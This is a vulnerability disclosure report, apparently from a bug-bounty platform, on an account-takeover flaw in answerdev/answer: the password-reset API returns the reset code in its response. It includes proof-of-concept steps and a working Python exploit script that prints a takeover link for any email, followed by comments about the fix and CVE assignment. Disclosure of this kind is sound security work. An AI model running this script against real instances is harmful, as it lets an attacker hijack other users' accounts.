Account Takeover via reset password in answerdev/answer
Reported on
Jan 24th 2023
Description
Password recovery leads to Account Take Over due to reset code leakage.
Proof of Concept
Create an acount in https://meta.answer.dev/ and verify mail, then log out.
Go to password recovery (https://meta.answer.dev/users/account-recovery), insert your email and capture the server response, will be something like the following:
{"code":200,"reason":"base.success","msg":"Success.","data":"CODE"}
Copy the "data" token, then go to
https://meta.answer.dev/users/password-reset?code=[CODE]
ATO :)
Impact
Compromise any account knowing only the email address
Script
Attached this script so you don't have to use Burpsuite :)
from sys import argv
import urllib3
from requests import post
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def ato(url: list, email: str) -> str:
try:
return f"Your Link: {''.join(url)}users/password-reset?code=" + \
post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]
except Exception as err:
return f"Cant reach URL: {err}"
if __name__ == "__main__":
if len(argv) != 3:
print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")
exit()
print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))
Permalinks
Thank you very much for your validation, do you need anything else at the moment?
Hello, How are you doing?
I have seen a commit where you have fixed the bug. https://github.com/answerdev/answer/commit/c1fa2b13f6b547b96da60b23350bbe2b29de542d
Could you please assign the commit with the report and assign CVE?
Thank you in advance, Best regards.
@admin no response in this thread since report validation, could you start the CVE assignment process please?
I have contacted an answerdev member privately, they want to keep the report private until the new release comes out. Is it possible to start the CVE assignment process without making the report public?